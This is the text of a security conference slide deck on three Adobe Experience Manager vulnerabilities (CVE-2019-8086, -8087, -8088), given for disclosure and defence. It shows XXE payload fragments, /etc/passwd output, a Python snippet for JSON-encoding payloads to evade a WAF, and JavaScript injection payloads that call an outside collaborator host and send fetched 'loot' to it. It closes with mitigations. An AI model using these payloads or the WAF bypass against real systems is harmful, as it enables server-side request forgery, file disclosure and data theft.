Slide 1
Slide 1 text
EUROPE'S LEADING AEM DEVELOPER CONFERENCE
28th – 30th SEPTEMBER 2020
A Hacker's perspective on AEM applications security
Mikhail Egorov, Security researcher & bug hunter
Slide 2
Slide 2 text
2
Intro
Slide 3
Slide 3 text
whoami
3
▪ Security researcher & full-time bug hunter
▪ https://bugcrowd.com/0ang3el
▪ https://hackerone.com/0ang3el
▪ Conference speaker
▪ https://www.slideshare.net/0ang3el
▪ https://speakerdeck.com/0ang3el
Slide 4
Slide 4 text
whoami
4
▪ Toolset for AEM hacking
▪ https://github.com/0ang3el/aem-hacker
Slide 5
Slide 5 text
5
APSB19-48
Slide 6
Slide 6 text
APSB19-48
6
▪ http://helpx.adobe.com/security/products/experi
ence-manager/apsb19-48.html
▪ CVE-2019-8086 / XML eXternal Entity Injection
▪ CVE-2019-8087 / XML eXternal Entity Injection
▪ CVE-2019-8088 / JavaScript Code Injection
Slide 7
Slide 7 text
XML eXternal Entity (XXE) attacks
7
▪ Do we see the parsed XML?
▪ What’s allowed by the XML parser?
▪ General external entities
▪ Parameter external entities
▪ External DTD loading
Slide 8
Slide 8 text
XML eXternal Entity (XXE) attacks
8
]>
&xxe;
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync …
Slide 9
Slide 9 text
XML eXternal Entity (XXE) attacks
9
%xxe;
]>
Slide 10
Slide 10 text
XML eXternal Entity (XXE) attacks
10
Slide 11
Slide 11 text
CVE-2019-8086
11
▪ GuideInternalSubmitServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.internalsubmit"}
)})
public class GuideInternalSubmitServlet
…
Slide 12
Slide 12 text
CVE-2019-8086
12
Slide 13
Slide 13 text
CVE-2019-8086
13
Slide 14
Slide 14 text
CVE-2019-8086
14
▪ XXE payload
]>
&a;
Slide 15
Slide 15 text
CVE-2019-8086
15
Slide 16
Slide 16 text
CVE-2019-8086
16
▪ Exploitation hints
▪ We can JSON-encode XXE payload to bypass a WAF
▪ In Java we can list directory content
▪ /proc/self/cwd
Slide 17
Slide 17 text
CVE-2019-8086
17
▪ JSON-encoding
data = ']>&a;'
result = "“
for c in data:
result = result + "\\u00%02x" % ord(c)
print result
Slide 18
Slide 18 text
CVE-2019-8086
18
Slide 19
Slide 19 text
CVE-2019-8086
19
▪ XXE payload
]>
&a;
Slide 20
Slide 20 text
CVE-2019-8086
20
Slide 21
Slide 21 text
CVE-2019-8086
21
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/
Slide 22
Slide 22 text
CVE-2019-8086
22
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ Only blind SSRF for some versions
Slide 23
Slide 23 text
CVE-2019-8087
23
▪ WSDLInvokerServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.wsdl"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
)})
public class WSDLInvokerServlet
…
Slide 24
Slide 24 text
CVE-2019-8087
24
Slide 25
Slide 25 text
CVE-2019-8087
25
Slide 26
Slide 26 text
CVE-2019-8087
26
▪ WSDL example
▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html
Slide 27
Slide 27 text
CVE-2019-8087
27
Slide 28
Slide 28 text
CVE-2019-8087
28
▪ Malicious xxe.wsdl
%dtd;
%param1;
]>
…
Slide 29
Slide 29 text
CVE-2019-8087
29
▪ Malicious loot.dtd
">
Slide 30
Slide 30 text
CVE-2019-8087
30
Slide 31
Slide 31 text
CVE-2019-8087
31
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/
Slide 32
Slide 32 text
CVE-2019-8087
32
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ On some AEM versions WSDLInvokerServlet is not
present
Slide 33
Slide 33 text
CVE-2019-8088
33
▪ GuideSubmitServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.submit", "af.agreement", "af.signSubmit"}
)})
public class GuideSubmitServlet extends SlingAllMethodsServlet {
…
Slide 34
Slide 34 text
CVE-2019-8088
34
Slide 35
Slide 35 text
CVE-2019-8088
35
Slide 36
Slide 36 text
CVE-2019-8088
36
Slide 37
Slide 37 text
CVE-2019-8088
37
Slide 38
Slide 38 text
CVE-2019-8088
38
Slide 39
Slide 39 text
CVE-2019-8088
39
▪ Sandboxed Rhino engine on some AEM versions
▪ No RCE
▪ Sandbox allows network interactions
▪ SSRF w/ ability to see the response
Slide 40
Slide 40 text
CVE-2019-8088
40
▪ JS payload
');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
rator.net');//
Slide 41
Slide 41 text
CVE-2019-8088
41
Slide 42
Slide 42 text
CVE-2019-8088
42
Slide 43
Slide 43 text
CVE-2019-8088
43
▪ JS payload
');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss
k6agtlkrafz.burpcollaborator.net',{loot:data})});//
Slide 44
Slide 44 text
CVE-2019-8088
44
Slide 45
Slide 45 text
CVE-2019-8088
45
Slide 46
Slide 46 text
CVE-2019-8088
46
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/
Slide 47
Slide 47 text
CVE-2019-8088
47
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ RCE or SSRF
Slide 48
Slide 48 text
APSB19-48
48
▪ Keep AEM up to date
▪ http://helpx.adobe.com/security/products/experie
nce-manager/apsb19-48.html
▪ Block jcr:write access for anonymous user
▪ /content/usergenerated/etc/commerce/smartlists/
▪ Remove demo content (Geometrixx, WeRetail, …)
Slide 49
Slide 49 text
49
Thank you
@0ang3el